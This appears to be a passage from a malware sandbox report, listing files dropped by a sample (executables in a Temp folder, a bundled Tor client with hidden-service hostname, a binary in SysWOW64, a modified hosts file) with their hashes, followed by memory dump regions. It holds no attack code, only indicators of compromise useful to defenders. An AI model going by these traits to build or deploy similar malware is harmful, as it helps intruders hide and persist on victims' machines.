3a60efc9992d02574b59745cbdfb2334

SHA1
28d4ef82fc79c586b1e32995789a84c1043a9c55

SHA256
397fcd310bfbaca2a5d934891ed1303048632bf33952eac5717fdca72ebdc994

SHA512
2fb2b6983040a9b747748b1e4d7c0e88e06e39a364ab8bbef2f4ee06c9f3a84cbe4ec1112ae5640ab98c3dc8a1a9bbc52ee63ac652cdd4f34c5e1e76784618ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\kano.exe
Filesize
1.3MB

MD5
960969e26854f881452cc83b61941174

SHA1
d3783bb7141ba5fb7520457902a3aa55adab9651

SHA256
accdb0787fae4cf07db205e2745ebfadd105f43963f14964470768483c894c8d

SHA512
3652fa2626d28c7563ea730034aba313eb972b48d54cf8af2b9fa51fdc05787df7800326d4efde9592c43a651a11f5f303f5d6ba26f90cd3742b20d4273360dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\mdll.exe
Filesize
740KB

MD5
d65acc2321b1580bc524b991fad0f78a

SHA1
884ed62a599b781384f45292659bef2b1cd5844b

SHA256
1f4c1b7370b3ba6ef950a84589fc458cf5b3a019a9bfe21aab986d0a26785291

SHA512
652eff94220920cdc5e8b69671466504705dc4e9cf05997e70d761092b52e118c7b413d4ea9681e94bc98369d5b59454f3059c0748b3a29a93f4a42e7ac578b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\riff.exe
Filesize
119KB

MD5
b37058a1a6fa72cf11d4bda54e15790a

SHA1
b8663b93cac0b88168d207fd648da5c2f9b775de

SHA256
85b1ce3f619ebeb3799acff17ee1356a7f3911e0b95f29b24111ae03fa2a03a0

SHA512
4848057ad580943a96e57713ca721ad3052001e8fd428651b08034592596f14e9396d0de970bdbffc552e104189aa81dfe7723bd13003637659198ec38fed818

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\p.dat
Filesize
4B

MD5
466accbac9a66b805ba50e42ad715740

SHA1
4899b53c2e1c29a9236040b0b95990c63148cb1e

SHA256
50f33355a7ee09448ecd0e3a6c4ff600e0e15f9545be01108dc163b36adf141d

SHA512
2caf3f68090e2961f6379b56f1058f4a6fde395803884c7db04732e0a58195f5d21bed7ae868beaa674f1f394e1c9cf64dd2b30d95079d827310973501fee5ac

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\data\cached-microdesc-consensus.tmp
Filesize
2.5MB

MD5
45e1fe56395ddf6415882bf18f7330a8

SHA1
8022c5f1fd7c409dfee95f27eeb905a0675320bf

SHA256
7912b39837c40bc8fd76ba9815b2e950e30ff104161ae5b01e4e7d27e5203ae8

SHA512
e76b2876ec59cd725d78d042ec5fe6cc79a71d15e99c0e1f2a6a6bdff5fc743fc2147d5fd02c0fb3a34daed68d2f97fdde6d8206fdd8885de738043e74d426d4

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\data\cached-microdescs.new
Filesize
7.7MB

MD5
ba49936c500dfb4303d3632a0081e625

SHA1
d35a1b0d64726fece0fd4b228acbaf93a2654cac

SHA256
14ae20c34ab479acdc22ab5a29381edcc530baba3d0d6a9d111dad77223b5c6a

SHA512
f958311e51dd5a52b9383c06c31a837bfe58df754bfa784c7319532c7f2010e1b646b567c63fcb253a8f68620b70c1155570f29d1cfbb97b1f630798ed0de8d2

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\host\hostname
Filesize
64B

MD5
8d6531e53b0e4ee66f50481f34eaa47e

SHA1
99c5194c5869c1b2dfb21b1d035aec271d5ae890

SHA256
c4ddc468727e7f3c92f20695ba44f52aefd92a9dce934a27a2dd700d24ce5a9e

SHA512
3367a04ad0b8ea9c48d6422239772eeb84ea4effafd2cc56646261a07fb062b31a6d69c80c71b9ce65519fc99ddc36ce1df3f591d7f60641925d793a035bc703

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libcrypto-1_1.dll
Filesize
3.5MB

MD5
6d48d76a4d1c9b0ff49680349c4d28ae

SHA1
1bb3666c16e11eff8f9c3213b20629f02d6a66cb

SHA256
3f08728c7a67e4998fbdc7a7cb556d8158efdcdaf0acf75b7789dccace55662d

SHA512
09a4fd7b37cf52f6a0c3bb0a7517e2d2439f4af8e03130aed3296d7448585ea5e3c0892e1e1202f658ef2d083ce13c436779e202c39620a70a17b026705c65c9

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libevent-2-1-7.dll
Filesize
1.1MB

MD5
a3bf8e33948d94d490d4613441685eee

SHA1
75ed7f6e2855a497f45b15270c3ad4aed6ad02e2

SHA256
91c812a33871e40b264761f1418e37ebfeb750fe61ca00cbcbe9f3769a8bf585

SHA512
c20ef2efcacb5f8c7e2464de7fde68bf610ab2e0608ff4daed9bf676996375db99bee7e3f26c5bd6cca63f9b2d889ed5460ec25004130887cd1a90b892be2b28

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libgcc_s_sjlj-1.dll
Filesize
1.0MB

MD5
bd40ff3d0ce8d338a1fe4501cd8e9a09

SHA1
3aae8c33bf0ec9adf5fbf8a361445969de409b49

SHA256
ebda776a2a353f8f0690b1c7706b0cdaff3d23e1618515d45e451fc19440501c

SHA512
404fb3c107006b832b8e900f6e27873324cd0a7946cdccf4ffeea365a725892d929e8b160379af9782bcd6cfeb4c3c805740e21280b42bb2ce8f39f26792e5a1

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libssl-1_1.dll
Filesize
1.1MB

MD5
945d225539becc01fbca32e9ff6464f0

SHA1
a614eb470defeab01317a73380f44db669100406

SHA256
c697434857a039bf27238c105be0487a0c6c611dd36cb1587c3c6b3bf582718a

SHA512
409f8f1e6d683a3cbe7954bce37013316dee086cdbd7ecda88acb5d94031cff6166a93b641875116327151823cce747bcf254c0185e0770e2b74b7c5e067bc4a

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libssp-0.dll
Filesize
246KB

MD5
b77328da7cead5f4623748a70727860d

SHA1
13b33722c55cca14025b90060e3227db57bf5327

SHA256
46541d9e28c18bc11267630920b97c42f104c258b55e2f62e4a02bcd5f03e0e7

SHA512
2f1bd13357078454203092ed5ddc23a8baa5e64202fba1e4f98eacf1c3c184616e527468a96ff36d98b9324426dddfa20b62b38cf95c6f5c0dc32513ebace9e2

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\libwinpthread-1.dll
Filesize
512KB

MD5
19d7cc4377f3c09d97c6da06fbabc7dc

SHA1
3a3ba8f397fb95ed5df22896b2c53a326662fcc9

SHA256
228fcfe9ed0574b8da32dd26eaf2f5dbaef0e1bd2535cb9b1635212ccdcbf84d

SHA512
23711285352cdec6815b5dd6e295ec50568fab7614706bc8d5328a4a0b62991c54b16126ed9e522471d2367b6f32fa35feb41bfa77b3402680d9a69f53962a4a

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\tor-real.exe
Filesize
4.0MB

MD5
07244a2c002ffdf1986b454429eace0b

SHA1
d7cd121caac2f5989aa68a052f638f82d4566328

SHA256
e9522e6912a0124c0a8c9ff9bb3712b474971376a4eb4ca614bb1664a2b4abcf

SHA512
4a09db85202723a73703c5926921fef60c3dddae21528a01936987306c5e7937463f94a2f4a922811de1f76621def2a8a597a8b38a719dd24e6ff3d4e07492ca

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\torrc.txt
Filesize
226B

MD5
e92e77e0c048c327231388946464402b

SHA1
888f1f0d2a2016b352d6f84269ed890ccaf5c1bb

SHA256
7c53ad41291de62f37a231e2c25a0c5be4b8e100a8c2f97e90e7fd1963439260

SHA512
211a1186fc4786a757c84fb7c2844aebe103e1e1879036467a0454291c6cba3e8d741d75b4fb4e6230e04df2e9d9d933ae05e490c3a6692059f6b35050981a17

Download Submit
C:\Users\Admin\AppData\Local\zxqaiiy6en\tor\zlib1.dll
Filesize
121KB

MD5
6f98da9e33cd6f3dd60950413d3638ac

SHA1
e630bdf8cebc165aa81464ff20c1d55272d05675

SHA256
219d9d5bf0de4c2251439c89dd5f2959ee582e7f9f7d5ff66a29c88753a3a773

SHA512
2983faaf7f47a8f79a38122aa617e65e7deddd19ba9a98b62acf17b48e5308099b852f21aaf8ca6fe11e2cc76c36eed7ffa3307877d4e67b1659fe6e4475205c

Download Submit
C:\Windows\SysWOW64\msdr.exe
Filesize
5.3MB

MD5
3974c5d0b92366bbc9af950c8d7f898d

SHA1
1b141b9cced64d1b86cd9d3460062ee7ecd34357

SHA256
c88dbfa8510ba03e204e2458434be95cb232f34a0b530a299ba6fdecd3c39820

SHA512
6b786fcf6ad40c3f8007e55242db7794f640177f3394a49a3ac9dc3b6cf3588eefe8e3db8ed21d9fcc3962de50d48c6c28867ab92a7da324389e19b9642170fa

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
3KB

MD5
00930b40cba79465b7a38ed0449d1449

SHA1
4b25a89ee28b20ba162f23772ddaf017669092a5

SHA256
eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

SHA512
cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

Download Submit
\??\pipe\crashpad_2172_IZLONPUJKYVHVBGT
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/392-428-0x000001568DDB0000-0x000001568DDDB000-memory.dmp

Filesize
172KB

Download
memory/392-431-0x00007FF9DDBF0000-0x00007FF9DDC00000-memory.dmp

Filesize
64KB

Download
memory/448-91-0x00007FF9FFBA0000-0x00007FFA00661000-memory.dmp

Filesize
10.8MB

Download
memory/448-95-0x00007FF9FFBA0000-0x00007FFA00661000-memory.dmp

Filesize
10.8MB

Download
memory/448-90-0x00000156A1AA0000-0x00000156A1AC4000-memory.dmp

Filesize
144KB

Download
memory/616-429-0x00007FF9DDBF0000-0x00007FF9DDC00000-memory.dmp

Filesize
64KB

Download
memory/616-420-0x00000231DCA20000-0x00000231DCA44000-memory.dmp

Filesize
144KB

Download
memory/616-427-0x00000231DCA50000-0x00000231DCA7B000-memory.dmp

Filesize
172KB

Download
memory/676-422-0x000002AE882F0000-0x000002AE8831B000-memory.dmp

Filesize
172KB

Download
memory/676-423-0x00007FF9DDBF0000-0x00007FF9DDC00000-memory.dmp

Filesize
64KB

Download
memory/1228-315-0x0000000006090000-0x00000000063E4000-memory.dmp

Filesize
3.3MB

Download
memory/1228-326-0x00000000067A0000-0x00000000067EC000-memory.dmp

Filesize
304KB

Download
memory/2584-383-0x0000000010000000-0x000000001000B000-memory.dmp

Filesize
44KB

Download
memory/3112-358-0x0000000073FF0000-0x00000000740EB000-memory.dmp

Filesize
1004KB

Download
memory/3112-357-0x0000000000500000-0x0000000000914000-memory.dmp

Filesize
4.1MB

Download
memory/3112-262-0x0000000073FF0000-0x00000000740EB000-memory.dmp

Filesize
1004KB

Download
memory/3112-359-0x0000000073FA0000-0x0000000073FE4000-memory.dmp

Filesize
272KB

Download
memory/3112-386-0x0000000000500000-0x0000000000914000-memory.dmp

Filesize
4.1MB

Download
memory/3112-361-0x0000000073A30000-0x0000000073B16000-memory.dmp

Filesize
920KB

Download
memory/3112-363-0x0000000073620000-0x0000000073916000-memory.dmp

Filesize
3.0MB

Download
memory/3112-362-0x0000000073920000-0x0000000073A24000-memory.dmp

Filesize
1.0MB

Download
memory/3112-364-0x0000000073590000-0x0000000073611000-memory.dmp

Filesize
516KB

Download
memory/3112-263-0x0000000073F70000-0x0000000073F96000-memory.dmp

Filesize
152KB

Download
memory/3112-264-0x0000000000500000-0x0000000000914000-memory.dmp

Filesize
4.1MB

Download
memory/3112-360-0x0000000073F70000-0x0000000073F96000-memory.dmp

Filesize
152KB

Download
memory/3192-0-0x0000000000E30000-0x0000000000E38000-memory.dmp

Filesize
32KB

Download
memory/3192-2-0x00007FF9FFBA0000-0x00007FFA00661000-memory.dmp

Filesize
10.8MB

Download
memory/3192-3-0x00007FF9FFBA3000-0x00007FF9FFBA5000-memory.dmp

Filesize
8KB

Download
memory/3192-4-0x00007FF9FFBA0000-0x00007FFA00661000-memory.dmp

Filesize
10.8MB

Download
memory/3192-1-0x00007FF9FFBA3000-0x00007FF9FFBA5000-memory.dmp

Filesize
8KB

Download
memory/3320-396-0x000002936DD90000-0x000002936DDB2000-memory.dmp

Filesize
136KB

Download
memory/3892-161-0x0000000007200000-0x000000000720A000-memory.dmp

Filesize
40KB

Download
memory/3892-163-0x0000000007390000-0x00000000073A1000-memory.dmp

Filesize
68KB

Download
memory/3892-129-0x0000000005980000-0x0000000005CD4000-memory.dmp

Filesize
3.3MB

Download
memory/3892-131-0x0000000005EB0000-0x0000000005EFC000-memory.dmp

Filesize
304KB

Download
memory/3892-146-0x000000006F4F0000-0x000000006F53C000-memory.dmp

Filesize
304KB

Download
memory/3892-145-0x0000000006FF0000-0x0000000007022000-memory.dmp

Filesize
200KB

Download
memory/3892-156-0x0000000007030000-0x000000000704E000-memory.dmp

Filesize
120KB

Download
memory/3892-157-0x0000000007060000-0x0000000007103000-memory.dmp

Filesize
652KB

Download
memory/3892-159-0x00000000077D0000-0x0000000007E4A000-memory.dmp

Filesize
6.5MB

Download
memory/3892-160-0x0000000007190000-0x00000000071AA000-memory.dmp

Filesize
104KB

Download
memory/3892-162-0x0000000007410000-0x00000000074A6000-memory.dmp

Filesize
600KB

Download
memory/3892-130-0x0000000005E60000-0x0000000005E7E000-memory.dmp

Filesize
120KB

Download
memory/3892-164-0x00000000073C0000-0x00000000073CE000-memory.dmp

Filesize
56KB

Download
memory/3892-119-0x0000000005810000-0x0000000005876000-memory.dmp

Filesize
408KB

Download
memory/3892-118-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/3892-165-0x00000000073D0000-0x00000000073E4000-memory.dmp

Filesize
80KB

Download
memory/3892-166-0x00000000074D0000-0x00000000074EA000-memory.dmp

Filesize
104KB

Download
memory/3892-167-0x00000000074B0000-0x00000000074B8000-memory.dmp

Filesize
32KB

Download
memory/3892-117-0x0000000005640000-0x0000000005662000-memory.dmp

Filesize
136KB

Download
memory/3892-116-0x0000000005010000-0x0000000005638000-memory.dmp

Filesize
6.2MB

Download
memory/3892-115-0x0000000002540000-0x0000000002576000-memory.dmp

Filesize
216KB

Download
memory/4332-410-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4332-415-0x00007FFA1DB70000-0x00007FFA1DD65000-memory.dmp

Filesize
2.0MB

Download
memory/4332-417-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4332-416-0x00007FFA1D680000-0x00007FFA1D73E000-memory.dmp

Filesize
760KB

Download
memory/4332-411-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4332-414-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4332-409-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4332-412-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4776-365-0x0000000000F10000-0x0000000001442000-memory.dmp

Filesize
5.2MB

Download
memory/4776-104-0x0000000000F10000-0x0000000001442000-memory.dmp

Filesize
5.2MB

Download
memory/4776-367-0x0000000000F10000-0x0000000001442000-memory.dmp

Filesize
5.2MB

Download
memory/4776-105-0x0000000000F10000-0x0000000001442000-memory.dmp

Filesize
5.2MB

Download
memory/4776-297-0x0000000000F10000-0x0000000001442000-memory.dmp

Filesize
5.2MB

Download
memory/5112-312-0x0000000010000000-0x000000001000B000-memory.dmp

Filesize
44KB

Download
memory/5960-787-0x000001E3BD520000-0x000001E3BD5D5000-memory.dmp

Filesize
724KB

Download
memory/5960-786-0x000001E3BD1F0000-0x000001E3BD20C000-memory.dmp

Filesize
112KB

Download
memory/5960-788-0x000001E3BD5E0000-0x000001E3BD5EA000-memory.dmp

Filesize
40KB

Download
memory/5960-789-0x000001E3BD750000-0x000001E3BD76C000-memory.dmp

Filesize
112KB

Download
memory/5960-790-0x000001E3BD730000-0x000001E3BD73A000-memory.dmp

Filesize
40KB

Download
memory/5960-791-0x000001E3BD790000-0x000001E3BD7AA000-memory.dmp

Filesize
104KB

Download
memory/5960-792-0x000001E3BD740000-0x000001E3BD748000-memory.dmp

Filesize
32KB

Download
memory/5960-793-0x000001E3BD770000-0x000001E3BD776000-memory.dmp

Filesize
24KB

Download
memory/5960-794-0x000001E3BD780000-0x000001E3BD78A000-memory.dmp

Filesize
40KB

Download